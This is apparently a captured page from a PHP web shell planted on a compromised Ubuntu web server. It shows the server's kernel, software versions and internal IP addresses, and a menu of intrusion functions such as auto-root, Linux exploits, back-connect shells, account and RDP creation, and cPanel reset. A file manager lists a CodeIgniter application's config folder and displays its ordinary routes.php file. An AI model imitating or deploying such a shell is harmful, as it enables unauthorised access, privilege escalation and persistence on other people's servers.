Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
application /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
autoload.php
4.41
KB
-rwxr-x--x
config.php
20.79
KB
-rwxr-x--x
constants.php
16.33
KB
-rwxr-x--x
database-user.php
4.51
KB
-rwxr-x--x
database.php
5.03
KB
-rwxr-x--x
doctypes.php
2.38
KB
-rwxr-x--x
foreign_chars.php
3.16
KB
-rwxr-x--x
hooks.php
618
B
-rwxr-x--x
index.html
131
B
-rwxr-x--x
memcached.php
498
B
-rwxr-x--x
migration.php
2.96
KB
-rwxr-x--x
mimes.php
10.31
KB
-rwxr-x--x
profiler.php
477
B
-rwxr-x--x
routes.php
7.7
KB
-rwxr-x--x
smileys.php
3.11
KB
-rwxr-x--x
user_agents.php
6.04
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : routes.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); /* | ------------------------------------------------------------------------- | URI ROUTING | ------------------------------------------------------------------------- | This file lets you re-map URI requests to specific controller functions. | | Typically there is a one-to-one relationship between a URL string | and its corresponding controller class/method. The segments in a | URL normally follow this pattern: | | example.com/class/method/id/ | | In some instances, however, you may want to remap this relationship | so that a different class/function is called than the one | corresponding to the URL. | | Please see the user guide for complete details: | | https://codeigniter.com/user_guide/general/routing.html | | ------------------------------------------------------------------------- | RESERVED ROUTES | ------------------------------------------------------------------------- | | There are three reserved routes: | | $route['default_controller'] = 'welcome'; | | This route indicates which controller class should be loaded if the | URI contains no data. In the above example, the "welcome" class | would be loaded. | | $route['404_override'] = 'errors/page_missing'; | | This route will tell the Router which controller/method to use if those | provided in the URL cannot be matched to a valid route. | | $route['translate_uri_dashes'] = FALSE; | | This is not exactly a route, but allows you to automatically route | controller and method names that contain dashes. '-' isn't a valid | class or method name character, so it requires translation. | When you set this option to TRUE, it will replace ALL dashes in the | controller and method URI segments. | | Examples: my-controller/index -> my_controller/index | my-controller/my-method -> my_controller/my_method */ $route['default_controller'] = 'home'; $route['404_override'] = ''; $route['translate_uri_dashes'] = FALSE; $route[_CNT_] = 'contact'; $route[_NSUB_] = 'contact/Nsubcrptn'; $route[md5('conUs')] = 'contact/'.MTHD_NEW; $route[_JOB_] = 'jobs'; $route[md5('jobUs')] = 'jobs/'.MTHD_NEW; $route[_JOB_.'/(:num)'.'/(:any)'] = 'jobs/'.MTHD_DTL.'/$1/$2/'; $route[_MRY_] = 'memories'; $route[_MDA_] = 'media'; $route[_EVNT_] = 'events'; $route[_EVNT_.'/(:num)'.'/(:any)'] = 'events/'.MTHD_DTL.'/$1/$2/'; $route[_STAF_] = 'staff'; $route[_FLTY_] = 'faculty'; $route[_WMNR_] = 'workshops'; $route[_WMNR_.'/(:num)'.'/(:any)'] = 'workshops/'.MTHD_DTL.'/$1/$2/'; $route[_COUR_] = 'courses'; $route[_COUR_.'/(:num)'.'/(:any)'] = 'courses/'.MTHD_DTL.'/$1/$2/'; $route[_PUB_] = 'publication'; $route[_PUB_.'/(:num)'.'/(:any)'] = 'publication/'.MTHD_DTL.'/$1/$2/'; $route[_PRJ_] = 'projects'; $route[_PRJ_.'/(:num)'.'/(:any)'] = 'projects/'.MTHD_DTL.'/$1/$2/'; $route[_FSAR_] = 'fareas'; $route[CL_DASH] = 'Dashboard'; $route[MY_PRO] = 'profile'; $route[MY_PRO_PWD] = 'profile/ResetPassWord'; $route[CL_LOGOUT] = 'Login/logout'; $route[SA_PWD_CHNG] = 'Login/SaForgetPassword'; $route[SA_PWD_RESET] = 'Login/SaResetPassWord'; $route['admin'] = 'Login'; $route['login'] = 'Login'; $route[_CAT] = 'cat'; $route[_CAT_AD] = 'cat/'.MTHD_ADD; $route[_CAT_NEW] = 'cat/'.MTHD_NEW; $route[_CAT.'/(:any)'] = 'cat/'.MTHD_UPDATE.'/$1'; $route[_CAT_DEL.'/(:any)'] = 'cat/'.MTHD_DEL.'/$1'; $route[_CAT_SRH] = 'cat/'.MTHD_SRCH; $route[_BLG] = 'ablog'; $route[_BLG_AD] = 'ablog/'.MTHD_ADD; $route[_BLG_NEW] = 'ablog/'.MTHD_NEW; $route[_BLG.'/(:any)'] = 'ablog/'.MTHD_UPDATE.'/$1'; $route[_BLG_DEL.'/(:any)'] = 'ablog/'.MTHD_DEL.'/$1'; $route[_BLG_SRH] = 'ablog/'.MTHD_SRCH; $route[_CMS] = 'pages'; $route[_CMS.'/(:any)'] = 'pages/'.MTHD_UPDATE.'/$1'; $route[_CMS_SRH] = 'pages/'.MTHD_SRCH; $route[_MEM] = 'mems'; $route[_MEM_AD] = 'mems/'.MTHD_ADD; $route[_MEM_NEW] = 'mems/'.MTHD_NEW; $route[_MEM.'/(:any)'] = 'mems/'.MTHD_UPDATE.'/$1'; $route[_MEM_DTL.'/(:any)'] = 'mems/'.MTHD_DTL.'/$1'; $route[_MEM_DEL.'/(:any)'] = 'mems/'.MTHD_DEL.'/$1'; $route[_MEM_IMG.'/(:any)'] = 'mems/'.MTHD_NEW_UP.'/$1'; $route[_MEM_SRH] = 'mems/'.MTHD_SRCH; $route[md5('imgdel')] = 'mems/imgdel'; $route[_ITM] = 'proj'; $route[_ITM_AD] = 'proj/'.MTHD_ADD; $route[_ITM_NEW] = 'proj/'.MTHD_NEW; $route[_ITM.'/(:any)'] = 'proj/'.MTHD_UPDATE.'/$1'; $route[_ITM_DTL.'/(:any)'] = 'proj/'.MTHD_DTL.'/$1'; $route[_ITM_DEL.'/(:any)'] = 'proj/'.MTHD_DEL.'/$1'; $route[_ITM_SRH] = 'proj/'.MTHD_SRCH; $route[md5('prjtrnd')] = 'proj/trndUpdte'; $route[_USR] = 'user'; $route[_USR_AD] = 'user/'.MTHD_ADD; $route[_USR_NEW] = 'user/'.MTHD_NEW; $route[_USR.'/(:any)'] = 'user/'.MTHD_UPDATE.'/$1'; $route[_USR_DEL.'/(:any)'] = 'user/'.MTHD_DEL.'/$1'; $route[_USR_ACS.'/(:any)'] = 'user/UserAccess/$1'; $route[_USR_SRH] = 'user/'.MTHD_SRCH; $route[_UDIG] = 'udig'; $route[_UDIG_AD] = 'udig/'.MTHD_ADD; $route[_UDIG_NEW] = 'udig/'.MTHD_NEW; $route[_UDIG.'/(:any)'] = 'udig/'.MTHD_UPDATE.'/$1'; $route[_UDIG_DEL.'/(:any)'] = 'udig/'.MTHD_DEL.'/$1'; $route[_UDIG_SRH] = 'udig/'.MTHD_SRCH; $route[_TYP] = 'projt'; $route[_TYP_AD] = 'projt/'.MTHD_ADD; $route[_TYP_NEW] = 'projt/'.MTHD_NEW; $route[_TYP.'/(:any)'] = 'projt/'.MTHD_UPDATE.'/$1'; $route[_TYP_DEL.'/(:any)'] = 'projt/'.MTHD_DEL.'/$1'; $route[_TYP_SRH] = 'projt/'.MTHD_SRCH; $route[_CRS] = 'corse'; $route[_CRS_AD] = 'corse/'.MTHD_ADD; $route[_CRS_NEW] = 'corse/'.MTHD_NEW; $route[_CRS.'/(:any)'] = 'corse/'.MTHD_UPDATE.'/$1'; $route[_CRS_DTL.'/(:any)'] = 'corse/'.MTHD_DTL.'/$1'; $route[_CRS_DEL.'/(:any)'] = 'corse/'.MTHD_DEL.'/$1'; $route[_CRS_SRH] = 'corse/'.MTHD_SRCH; $route[_JBC] = 'jobc'; $route[_JBC_AD] = 'jobc/'.MTHD_ADD; $route[_JBC_NEW] = 'jobc/'.MTHD_NEW; $route[_JBC.'/(:any)'] = 'jobc/'.MTHD_UPDATE.'/$1'; $route[_JBC_DTL.'/(:any)'] = 'jobc/'.MTHD_DTL.'/$1'; $route[_JBC_DEL.'/(:any)'] = 'jobc/'.MTHD_DEL.'/$1'; $route[_JBC_SRH] = 'jobc/'.MTHD_SRCH; $route[_WRK] = 'wrks'; $route[_WRK_AD] = 'wrks/'.MTHD_ADD; $route[_WRK_NEW] = 'wrks/'.MTHD_NEW; $route[_WRK.'/(:any)'] = 'wrks/'.MTHD_UPDATE.'/$1'; $route[_WRK_DTL.'/(:any)'] = 'wrks/'.MTHD_DTL.'/$1'; $route[_WRK_DEL.'/(:any)'] = 'wrks/'.MTHD_DEL.'/$1'; $route[_WRK_SRH] = 'wrks/'.MTHD_SRCH; $route[_MDC] = 'mdc'; $route[_MDC_AD] = 'mdc/'.MTHD_ADD; $route[_MDC_NEW] = 'mdc/'.MTHD_NEW; $route[_MDC.'/(:any)'] = 'mdc/'.MTHD_UPDATE.'/$1'; $route[_MDC_DTL.'/(:any)'] = 'mdc/'.MTHD_DTL.'/$1'; $route[_MDC_DEL.'/(:any)'] = 'mdc/'.MTHD_DEL.'/$1'; $route[_MDC_SRH] = 'mdc/'.MTHD_SRCH; $route[md5('mdctrnd')] = 'mdc/trndUpdte'; $route[_TYPA] = 'puba'; $route[_TYPA_AD] = 'puba/'.MTHD_ADD; $route[_TYPA_NEW] = 'puba/'.MTHD_NEW; $route[_TYPA.'/(:any)'] = 'puba/'.MTHD_UPDATE.'/$1'; $route[_TYPA_DEL.'/(:any)'] = 'puba/'.MTHD_DEL.'/$1'; $route[_TYPA_SRH] = 'puba/'.MTHD_SRCH; $route[_TYPV] = 'pubv'; $route[_TYPV_AD] = 'pubv/'.MTHD_ADD; $route[_TYPV_NEW] = 'pubv/'.MTHD_NEW; $route[_TYPV.'/(:any)'] = 'pubv/'.MTHD_UPDATE.'/$1'; $route[_TYPV_DEL.'/(:any)'] = 'pubv/'.MTHD_DEL.'/$1'; $route[_TYPV_SRH] = 'pubv/'.MTHD_SRCH; $route[_PUB] = 'publ'; $route[_PUB_AD] = 'publ/'.MTHD_ADD; $route[_PUB_NEW] = 'publ/'.MTHD_NEW; $route[_PUB.'/(:any)'] = 'publ/'.MTHD_UPDATE.'/$1'; $route[_PUB_DTL.'/(:any)'] = 'publ/'.MTHD_DTL.'/$1'; $route[_PUB_DEL.'/(:any)'] = 'publ/'.MTHD_DEL.'/$1'; $route[_PUB_SRH] = 'publ/'.MTHD_SRCH; $route[md5('publtrnd')] = 'publ/trndUpdte'; $route[_EVNT] = 'evnt'; $route[_EVNT_AD] = 'evnt/'.MTHD_ADD; $route[_EVNT_NEW] = 'evnt/'.MTHD_NEW; $route[_EVNT.'/(:any)'] = 'evnt/'.MTHD_UPDATE.'/$1'; $route[_EVNT_DTL.'/(:any)'] = 'evnt/'.MTHD_DTL.'/$1'; $route[_EVNT_DEL.'/(:any)'] = 'evnt/'.MTHD_DEL.'/$1'; $route[_EVNT_SRH] = 'evnt/'.MTHD_SRCH; $route[md5('evnttrnd')] = 'evnt/trndUpdte';
Close